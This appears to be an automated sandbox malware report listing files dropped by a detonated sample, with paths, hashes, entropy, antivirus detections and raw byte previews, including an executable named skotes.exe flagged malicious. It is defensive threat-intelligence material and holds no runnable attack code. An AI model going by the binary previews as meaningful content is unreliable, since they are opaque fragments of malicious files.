                                                                                                                                                                                                                                                                          Preview:..({.....65."...f....k%. +......v.Y.H2....A;U...'.s....3..R_H......QG...&XKw.,.f.MB....6.&tI.G*...J..V.P*... ..]....R.l.N...r.+da..h...d.*..^.t...?K....cR....z...h0...8.sEt...i.h|.c......F..LA.Y9.T.]_..!u...[e.#(.pN.t.0z..[U....N......K7.<..X..%..H..*w.C.E."...|....3...'..2.wi....?i..\(..8F. .s.T..#6...B.Hq..^..&XSgE.w.g....A0.<..w@.....M......r.M{......KP.V]...?......Qh...!....1..z .".*$J..xCB^.T..7.....,....g^.tXs.f...gz%..........5o.."x..2.....Q.g.`=..1..A.. .....L.B.....H.....q.B.<.o."u.ud.7.....y\.....d.Eil.".,.cw..m...Ax!.]R...I..}...<.L*...tj...._N.(..p...+v..3.....O..'V..).......L9M....sY...._..@..|.&UC.!.J..*Fp..).Nc.......\.......O.Ge.t.x...};.U.x.|.R...._.3....2,,+..~..)d.h..?....b....@..5....3....x.b.W{.wB.......i.g..N./..Aq.y....k.9w.g.yx.l2.Y;h..`J..x.XT....80.F.......!.....?90.$.....[.....+'{W.D@.]."[.r.j_...BW.f/.re.*.hpe......U.....V4].X_.=..r.S.Du]Ak.a....@...AAj.B...}.|:.`..-H=.......|.q.tP..h.....g.8b}z4.G8^.<N...

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Show

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):55296
                                                                                                                                                                                                                                                                          Entropy (8bit):6.654459170489211
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:XaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVml:XtNPnj0nEoXnml
                                                                                                                                                                                                                                                                          MD5:35469FF6842A57BD9788DB58A1E1C0CC
                                                                                                                                                                                                                                                                          SHA1:47B76F8AE04AEFF8CDE18E15A6AB9D072214A54A
                                                                                                                                                                                                                                                                          SHA-256:7006A277A8B2AB82AE4409DF94E227083287B7678B9FFE79E2E19D534F1335EC
                                                                                                                                                                                                                                                                          SHA-512:3B97531E8D41C069DD9A8A6F3FE0FBC498FACBB6DF823525A726499CF5A4EA40879B7D02138C6D020520DF2D59C28EFC2F51470BF9AAC9F00B6F40101FE51AD0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.....~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x.......f.~....h....E..GP..\....}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Silent

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                          Entropy (8bit):6.555933383144663
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:65fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubT:ufhnueoMmOqDoioO5bLezW9FfTun
                                                                                                                                                                                                                                                                          MD5:04DF53FD74B69C92DBA8CD83EAFA1180
                                                                                                                                                                                                                                                                          SHA1:275765D9C7E3300C0B7579AE3DE32F658E12945C
                                                                                                                                                                                                                                                                          SHA-256:DB246122E92D7C13AE1050C65C1E1F722F4E98375C9875D719F775CFE1478EE9
                                                                                                                                                                                                                                                                          SHA-512:44DFA1CCF0C3B054DAC3FADBA5A87C7C56F318C74DFF83810310E349B80029F19A08133C502DD7B65E543B882E567AC19DE54F8A520FF073774894F6F8320EF5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:..@...Pjr...........9\$Dt......P....D$...@.Ph........3......B..\$0j.....D$4.\$<PW.u..D$L..........x .E....@....f.x..t...@...Pjr.p....L$0.&q......P....D$....f..A.......t$@.L$d.=...D$...P.D$$P.D$hP.u.S.;......L$`.....G....tp....Rt[...t9...t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Symptoms

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):53248
                                                                                                                                                                                                                                                                          Entropy (8bit):6.721434698149147
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:4Mf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdno:Dh+I+FrbCyI7P4Cxi8q0vQEcmFdno
                                                                                                                                                                                                                                                                          MD5:7847E23CCE3770257DD905024CDC5020
                                                                                                                                                                                                                                                                          SHA1:2D2070CB134CCDE38544814A1E1E35A08AB95EA6
                                                                                                                                                                                                                                                                          SHA-256:75F0206860B962D3636015D98C420EC5EBF4023CA7B75B747AEB388AAFE9049A
                                                                                                                                                                                                                                                                          SHA-512:97F5B6924C23343F732AB470B8006EF2B25C92FADB3560FD56DB6E53B8DAF0C65CE66EB416BD03126C3B1AE6FA2CF66178A487C0EABAD24263A3DE7253C236B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.h..L....3..u.E..0....Y.u..E....8........?k.0.....M..D.(.t!W.....YP....I...u.........0.I.................u..E.............\.......u.M..1.....Y..U.....E..M..E..E.E.P.u..E.P.D.....]..U..QV.u..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Volunteer

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):95232
                                                                                                                                                                                                                                                                          Entropy (8bit):4.612003853136968
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:ZKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBR:ZKaj6iTcPAsAhxjgarB/5el3EYrDWD
                                                                                                                                                                                                                                                                          MD5:D9EBAE5A1B2F513852F89FDC3D31672D
                                                                                                                                                                                                                                                                          SHA1:DFA418E6FD3C5B16B685EA0E09CC159A5FF6ED14
                                                                                                                                                                                                                                                                          SHA-256:B9A3C8E95D261CC9C6B28B58518554120AA2CFA09C2BE81C609C0F01B26B313D
                                                                                                                                                                                                                                                                          SHA-512:D5A9226EA1152566872669C4072BEA6498C930E405DB45FB6B7B63CD7A807BE814C7A71E983851F5D7A66B131319A850DDB10E1D4661D4CACD3082CB5C1CAEAC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.........................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.................................(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Wanting

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41523
                                                                                                                                                                                                                                                                          Entropy (8bit):7.995572172924696
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:768:KQQtn0ggXOoA6vd4BnDiNdFDS0YV56wjvXNRsQEY4qGmScAh6SYN:KQQywQvT1TYV5LjvNyhqGXce67
                                                                                                                                                                                                                                                                          MD5:6F1A940A0159306F679FF4D03524AE0B
                                                                                                                                                                                                                                                                          SHA1:2B48523D0BF3828ABD8590E13A03B5946B3D442D
                                                                                                                                                                                                                                                                          SHA-256:7E294DD8F93A9A7D79FB118070F548D1E8FDA62FA96AF973E1A950F150B0331E
                                                                                                                                                                                                                                                                          SHA-512:4DDF0AFA24B981BAC3CA60CB52AF73E39BF7155972F49968C8FC85A17F561208D76158CD117948467176696A0BA87B9AC33658C5E7EF1EF3D4201139E959F932
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:...._..*...b@}.+....G.Qb._.._A...Q....u.V.^..-y.R...bP{..1..c_%..%.wt.oCbD.z.2.r'.-......V...h..g9S...e..K.ozJ6.d........F<;I.<nv.r..-.W.*s"q.>A.`. ....]Q&[...B.......b(...... .7...{..,m1.%...I.%...&... .........&[.67*.+..&..@.LV......B.C..W..2.y...Ji.L1..DY.h..6..z.B..n..K.A..P....1+J%..~.)....Q.M4.s.$..\X6..O...,_...V.7..O../........~.$yV(-.@...^.6..../.A.q..L.mN...B....S.NO...j.....iN.8........`...}.a.4..#>.....-..j\3.E0...6~...N*...0.......T......c.c.5..H...@].Ax..P@...W=T.2(w_.......iRO'.wF......@L.)......T....Dp..z9.s......w .....^........o...*n.W.a.V.^o.=..G..q..2.g<5....C.... .......S...BM."..MzHK...v.Z*..H.........v?IT..f1.N.ts.....dIQ=.[..dWg.4OR;.h.x.P.i......Cj...@W.zg...L,...y.f25D...}M..5.]..NB!8.9..L*;..AT..z..?....)z.....Z....oA.WM.(..H.J......|.4..2. ...9...e..g..z...[..2]-a.N,@..;......3...I$..#.9..Z9...<..[X...'m....>.../.....WPe.@.._...=P........|`R...`..a.)...I(J.R......z. .......1B7..d.=..jy.q`&..4n..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30j00w5b.ldx.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lsg5yxz.jrt.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpvqtifh.yt2.psm1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lk3xv2zh.sma.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vay35t4b.5f4.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xijuti4w.xuy.ps1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2992640
                                                                                                                                                                                                                                                                          Entropy (8bit):6.587568854680756
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:D5TQ0VpSQkbo7FoWKxx/X0+fI1HARitBDodeFIbi:NfVpSTl/xxPxfI1gRitao
                                                                                                                                                                                                                                                                          MD5:5C8CB972F2920BD6EDC98690F1634958
                                                                                                                                                                                                                                                                          SHA1:73D87008BDA6FD11921BFAD989B48C09CE82B20F
                                                                                                                                                                                                                                                                          SHA-256:246AFFA1629352F335434A02500B288A55592990B1B669A6A5CB112C20F04F8F
                                                                                                                                                                                                                                                                          SHA-512:CC9C4E3D03B493778A2475B02E6D0FA14B27688CA09FDBEF1BA2E7ACE2BB6C591C5E93D0B4596CE1EB1C85252461089193A14390725F01FD4A2A4F1598E21D4D
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1.......-...@.................................W...k...........................091..............................81..................................................... . ............................@....rsrc...............................@....idata ............................@...qavlzoyx..*.......*.................@...ixfbxqpd.....@1.......-.............@....taggant.0...P1.."....-.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\7z.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1679360
                                                                                                                                                                                                                                                                          Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                                                          MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                                          SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                                          SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                                          SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\7z.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):468992
                                                                                                                                                                                                                                                                          Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                                                          MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                                          SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                                          SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Reputation:unknown
